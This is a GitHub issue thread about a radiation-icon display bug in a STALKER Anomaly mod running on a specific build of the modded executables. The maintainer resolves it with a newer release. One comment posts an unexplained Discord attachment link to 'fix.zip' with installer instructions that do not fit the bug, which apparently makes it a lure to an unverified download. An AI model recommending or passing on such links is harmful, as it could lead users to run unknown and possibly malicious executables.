### ISSUE TITLE
Arszi's radiation overhaul demonized edition issue with 2024.09.02 modded exes.

### ISSUE THREAD

**Issue by twoVipers** [themrdemonized/STALKER-Anomaly-modded-exes#88]
I have a bug where instead of radiation icon, the game displays a gray square. I tried the mod by itself and said modded exes version, and again in combo with other mods, leads to the same thing.
I haven't tried to solve the bug myself because i don't know how.

Link to discord post and screenshot: 
https://discord.com/channels/456765861953536020/1151257712550739999/threads/1280151770764546180

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by themrdemonized** [comment]
does it work with previous versions?

**Comment by twoVipers** [comment]
In 2024.08.25 version the radiation icon does not appear at all with the mod, so does not the gray square. The only radiation indicator i get is the status one, where it shows how much i am irradiated already.

**Comment by themrdemonized** [comment]
Alright, thanks for the feedback. You can use previous version for now, we'll try to fix that

**Comment by themrdemonized** [comment]
please check 2024.09.04 version

**Comment by themrdemonized** [comment]
Yes, that is correct. Closing the issue, thanks again
